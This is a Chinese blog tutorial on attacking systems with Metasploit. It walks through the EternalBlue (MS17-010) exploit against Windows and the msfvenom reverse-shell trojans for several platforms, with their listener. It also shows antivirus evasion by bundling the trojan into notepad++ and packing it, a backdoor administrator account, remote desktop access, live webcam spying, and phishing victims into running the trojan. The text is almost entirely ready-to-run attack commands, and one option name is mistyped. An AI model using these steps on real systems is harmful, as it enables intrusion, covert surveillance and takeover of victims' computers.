操作系统漏洞--渗透windows永恒之蓝(2017)整体流程

下载Kali

metasploit基本介绍

msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新

metasploit让复杂的漏洞攻击流程变得非常简单,学习几个小时,就能对操作系统等主流漏洞发起危害攻击

msf攻击windows之永恒之蓝漏洞

准备工作

msf的使用法则

使用模块-->配置模块必选项-->运行模块
三步操作,就能实现对主流漏洞的攻击

1.打开终端

2.切换至超级用户

# 切换到管理用户
sudo su
# 输入账号密码

3.进入msf的命令行

msfconsole

永恒之蓝漏洞

永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人) 公布一大批网络攻击工具,其中包含"永恒之蓝" 工具,"永恒之蓝"利用Windows系统的SMB漏洞可以获取系统最高权限,5月12日,不法分子通过改造"永恒之蓝" 制作了wannacry勒索病毒,英国,俄罗斯,整个欧洲以及中国国内多个高校校内网,大型企业内网和政府机构专网中招,被勒索支付高额赎金才能机密恢复文件.

metasploit漏洞攻击永恒之蓝

1.搜索模块

# ms17_010是微软给永恒之蓝漏洞的编号
search ms17_010

2.使用模块

use exploit/windows/smb/ms17_010_eternalblue

# 或者,根据上图最前面的序号来使用,如:
use 0

3.设置必选项
此配置为:目标IP地址,端口

攻击载荷,此配置为:攻击后想干什么,默认是获取目标主机的命令执行权限

# 1. 查看设置项,结果如上图1
show options

# 2. 如上图1中,需要配置目标IP,端口已经默认为445
set PHOSTS 192.168.1.133    # 多个目标以空格间隔,或网段192.168.1.0-254

# 3. 运行模块
run

攻击成功后,会直接进入meterpreter命令行,如下

msfvenom--远控木马生成工具

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线
[* msfvenom在shell(kali操作系统的终端)里使用,不是msfconsole终端]

会被杀毒软件发现的远控木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本机kaliIP地址 lport=想要监听的端口 -f exe -o demo.exe    # 攻击windows,-p 指定使用哪个模块做什么操作 -f format指生成什么格式的文件  -o output指生成什么文件名
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=本机kaliIP地址 lport=想要监听的端口 -f exe -o demo.exe      # 攻击linux
msfvenom -p osx/x64/meterpreter/reverse_tcp lhost=本机kaliIP地址 lport=想要监听的端口 -f exe -o demo.exe        # 攻击MacOS
msfvenom -p android/x64/meterpreter/reverse_tcp lhost=本机kaliIP地址 lport=想要监听的端口 -f apk -o demo.apk    # 攻击android,
msfvenom -p iphone/x64/meterpreter/reverse_tcp lhost=本机kaliIP地址 lport=想要监听的端口 -f exe -o demo.exe     # 攻击iphone

会生成一个exe文件,但是没有人监听此木马的执行结果,所以需要启动服务监听木马是否被触发

# 1. 进入msf
msfconsole

# 2. 使用模块
use exploit/multi/handler

# 3. 查看配置项
show options

# 4. 配置必选项,将攻击载荷换为远控木马工具
set payload windows/x64/meterpreter/reverse_tcp

# 5. 再次查看配置项
show options

# 4. 配置必选项,设置监听IP和端口
set LHOST 本机KaliIP地址
set LPORT 想要监听的端口,必须与上面生成的远控木马监听端口一致

# 5. 运行模块
run

对方一点击,就会获取到目标机的命令行权限,如下图

绕过杀毒软件的远控木马

最基础的免杀(如下),不同的杀毒软件效果不同
方式1.最原始的免杀方式(效果最差):捆绑木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本机IP lport=监听端口 -f exe -x notepad++.exe -o notepad++.exe   # 将木马和notepad++绑定在一起,当然也可以选择其他软件进行捆绑

方式2.加壳(压缩壳,加密壳) -- themida工具,自行百度下载即可,界面如下图
使用方式,将木马拖拽到工具中,点击Protect,如下图2,会自动生成后缀为xxx_protect.exe的文件,即是加壳后的文件

方式3.方式2是绕不过360,小红伞,等杀毒软件的

攻击成功之后能做什么

metapreter是强大的后渗透模块,可以输入help查看帮助信息

包括并不仅限于可以控制受害机的远程控制,命令执行,摄像头监控,密码获取,创建后门用户,破坏篡改系统等等,
这些看起来非常复杂又高级的操作都能用meterprete中一行或几个字母简单完成

创建后门用户并开启远程连接

shell   # 进入命令行
net user zhangsan 123456 /add && net localgroup administrators zhangsan /add 
exit
run getgui -e

打开对方摄像头,help中有关于摄像头的权限才可以

# 攻击成功后弹出的meterpreter终端
webcam_list    # 查看目标机的摄像头列表
webcam_stream  # 打开目标机的摄像头,并实时显示

远控木马种植方式

1.渗透进入目标机,种植木马
2.生成木马病毒后,钓鱼目标,想办法发送给对方,即可生成后门

posted @ 2023-08-08 21:20  河图s  阅读(284)  评论(0)    收藏  举报